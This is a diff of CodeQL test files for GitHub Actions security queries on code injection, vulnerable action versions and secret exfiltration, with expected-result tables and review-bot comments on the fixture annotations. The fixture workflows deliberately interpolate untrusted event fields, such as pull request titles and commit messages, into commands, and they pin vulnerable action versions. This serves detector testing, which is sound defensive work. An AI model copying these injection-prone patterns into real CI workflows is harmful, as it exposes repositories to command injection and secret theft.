@@ -697,62 +756,3 @@ nodes subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | -#select -| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | Potential code injection in $@, which may be controlled by an external user. 
| .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | ${{ inputs.spelling }} | -| .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | ${{ inputs.github_username }} | -| .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | ${{ inputs.github_email }} | -| .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | ${{ github.head_ref \|\| github.ref }} | -| .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | -| .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | ${{ steps.changed-files3.outputs.all_changed_files }} | -| .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | ${{ steps.changed-files5.outputs.all_changed_files }} | -| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | -| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | -| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | -| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | -| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | -| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | -| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | -| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | -| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | -| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | -| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | -| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | -| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | -| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | -| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | -| .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | -| .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | -| .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | -| .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | -| .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | -| .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | -| .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | -| .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | -| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | -| .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | -| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | -| .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | diff --git a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref index f7ce5674994..5717bcec732 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref @@ -1 +1,2 @@ -Security/CWE-094/CodeInjectionMedium.ql +query: Security/CWE-094/CodeInjectionMedium.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml index 5153e2cc780..34b85a6bd83 100644 --- a/actions/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml 
+++ b/actions/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml @@ -14,8 +14,8 @@ jobs: - uses: actions/download-artifact@v3 # SECURE - uses: actions/download-artifact@v3.0.2 # SECURE - uses: actions/download-artifact@v4.1.0 - - uses: actions/download-artifact@eaceaf801fd36c7dee90939fad912460b18a1ffe # v4.1.2 - - uses: actions/download-artifact@9bc31d5ccc31df68ecc42ccf4149144866c47d8a # v3.0.2 # SECURE + - uses: actions/download-artifact@eaceaf801fd36c7dee90939fad912460b18a1ffe # v4.1.2 # $ Alert + - uses: actions/download-artifact@9bc31d5ccc31df68ecc42ccf4149144866c47d8a # v3.0.2 # SECURE # $ Alert - uses: actions/download-artifact@v4 # SECURE - uses: actions/download-artifact@v4.1.7 # SECURE - uses: actions/download-artifact@v4.1.8 # SECURE diff --git a/actions/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref b/actions/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref index c9bd66e4dd0..fe1d219fbff 100644 --- a/actions/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref +++ b/actions/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref @@ -1,2 +1,2 @@ -Security/CWE-1395/UseOfKnownVulnerableAction.ql - +query: Security/CWE-1395/UseOfKnownVulnerableAction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml index ed496f3eeb2..657204ffd53 100644 --- a/actions/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml @@ -13,4 +13,4 @@ jobs: with: args: > -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} - -Dsonar.pullrequest.key=${{ github.event.pull_request.title }} + -Dsonar.pullrequest.key=${{ github.event.pull_request.title }} # $ Alert 
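Review bot: The new line `- uses: actions/download-artifact@9bc31d5ccc31df68ecc42ccf4149144866c47d8a # v3.0.2 # SECURE # $ Alert` in the CWE-1395 test1.yml hunk carries both the old `# SECURE` label and the new `$ Alert` expectation, which contradict each other. The neighbouring lines keep `# SECURE` only where no alert is expected, so a reader of the fixture cannot tell which annotation reflects the query's intended behaviour for a SHA-pinned v3.0.2. If the alert is intended, drop the stale label: `- uses: actions/download-artifact@9bc31d5ccc31df68ecc42ccf4149144866c47d8a # v3.0.2 # $ Alert`; if it is not, the expectation itself is wrong. The `steps:` list this belongs to continues outside the hunk.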
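Review bot: In the CWE-200 test1.yml hunk the `# $ Alert` appended to `-Dsonar.pullrequest.key=${{ github.event.pull_request.title }}` sits inside the `args: >` folded block scalar, where `#` does not start a YAML comment, so the marker becomes part of the `args` value rather than an annotation. The inline-expectation harness presumably matches on source text, so the test may still pass, but the fixture no longer mirrors a real workflow, and the recorded location `15:11:16:75` (unchanged in the .expected hunk) is worth confirming against where the harness expects the marker. YAML permits a comment after the block indicator, so `args: > # $ Alert` on the header line would keep the marker a true comment if the harness accepts it on that line. The step that owns this `with:` block starts outside the hunk.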
diff --git a/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected index 59b58e03be7..75bf3897164 100644 --- a/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected +++ b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected @@ -1,6 +1,6 @@ +#select +| .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | Potential secret exfiltration in $@, which may be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | edges nodes | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths -#select -| .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | Potential secret exfiltration in $@, which may be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | diff --git a/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref index c750afbeaf4..48ae5cf9646 100644 --- a/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref +++ b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref @@ -1,2 +1,2 @@ -experimental/Security/CWE-200/SecretExfiltration.ql - +query: experimental/Security/CWE-200/SecretExfiltration.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
